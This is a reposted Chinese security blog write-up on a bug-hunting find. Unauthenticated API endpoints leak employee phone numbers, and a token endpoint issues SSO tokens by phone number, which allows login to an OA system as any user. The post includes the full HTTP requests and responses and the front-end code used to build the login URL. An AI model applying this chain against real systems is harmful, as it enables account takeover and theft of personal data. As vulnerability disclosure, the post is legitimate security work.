某系统接口未授权获取ssotoken造成OA系统任意用户登录

admin 2024年7月10日11:51:46评论6 views字数 2856阅读9分31秒阅读模式

No.1

漏洞挖掘过程

通过浏览器插件findsomething爬取前端api接口地址,然后放到burp的爆破模块进行遍历接口,找到疑似未授权的接口

通过遍历,找到一个接口api/v1/ecology/token?mobile= 

但是这个时候是没有用户手机号的,这个在遍历的文件中有找到一个接口api/v1/person/organize/tree/person存在未授权漏洞,但是没有返回数据

但是我把organize/tree/person这段内容被删除后访问它返回了手机号和姓名等信息

就是访问地址api/v1/person地址获取到手机号和姓名的信息

请求包

GET /api/v1/person HTTP/1.1Host: xxxxxxxxxCookie: JSESSIONID=5X0PSWrt50FOjlhK0sB8GHFp5G57WzjerUe1eI3aSec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"Accept: application/json, text/plain, */*Sec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://xxxxxxxxxSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://xxxxxxxxxAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

返回包

{    "data": [        {            "adcd": "xxxx",            "adcdName": "xxx",            "cellphone": "138xxxxxxxx",            "dutyName": "",            "functions": "",            "id": "xxxx-xxxx-xxxx-xxxx-xxxxxxxxx",            "ident": 0,            "organizeId": "xxxx-xxxx-xxxx-xxxx-xxxxxxxxx",            "organizedName": "xx市",            "pName": "员工名称",            "post": "",            "sortId": 0,            "tenantId": "xxxx-xxxx-xxxx-xxxx-xxxxxxxxx"        }      ] }

然后通过手机号测试获取token这个接口

请求包

GET /zhsw/api/v1/ecology/token?mobile=13888888888HTTP/1.1Host: xxxxxxxxxCookie: JSESSIONID=5X0PSWrt50FOjlhK0sB8GHFp5G57WzjerUe1eI3aSec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"Accept: application/json, text/plain, */*Sec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://xxxxxxxxxSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://xxxxxxxxxAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

返回包

HTTP/1.1 200 OKServer: nginxDate: Sun, 16 Jun 2024 17:44:45 GMTContent-Type: application/json; charset=UTF-8Content-Length: 221Connection: closetlogTraceId: 14914937509380224x-istrong-safe: unsafeX-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINAccess-Control-Expose-Headers: x-istrong-safeApiAuthor: X-Content-Type-Options: nosniffContent-Security-Policy: upgrade-insecure-requestsX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=block{"data":"4C76C6F25524999DE24FFB97989EC7BCA34676699A0D5BCC222A938E51CD97F4F394536EFEE7E4302FB8BE6A61E370E5A8983E6DF86279FEFCCD10AE53C23236","message":"","paging":null,"schema":null,"success":true,"timestamp":1718559885398}

返回了一个json数据包,但是现在这个时候我不知道他是有什么用的,我就在前端找到使用api/v1/ecology/token?mobile= 接口的地方,查看他的前端代码

getMobileToken: function() {    var t = this      , r = this.url      , e = this.$core.user.tel;    a.a.get("/zhsw/api/v1/ecology/token?mobile=".concat(e)).then((function(e) {        var n = e.data.data;        r = r.replace("index.html#", "index.html?ssoToken=".concat(n, "#")),        t.src = r    }    ))}

在前端找到一个拼接ssotoken参数的地方

window.location.href = "https://xxxx/wui/index.html#/?logintype=1&ssoToken=" + e

将data数据进行拼接,成功登录OA系统

这时可以通过OA获取所有用户的手机号从而登录他的OA账号

某系统接口未授权获取ssotoken造成OA系统任意用户登录

No.2

原文始发于微信公众号(隐雾安全):某系统接口未授权获取ssotoken造成OA系统任意用户登录

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月10日11:51:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   某系统接口未授权获取ssotoken造成OA系统任意用户登录https://cn-sec.com/archives/2938637.html

发表评论

匿名网友 填写信息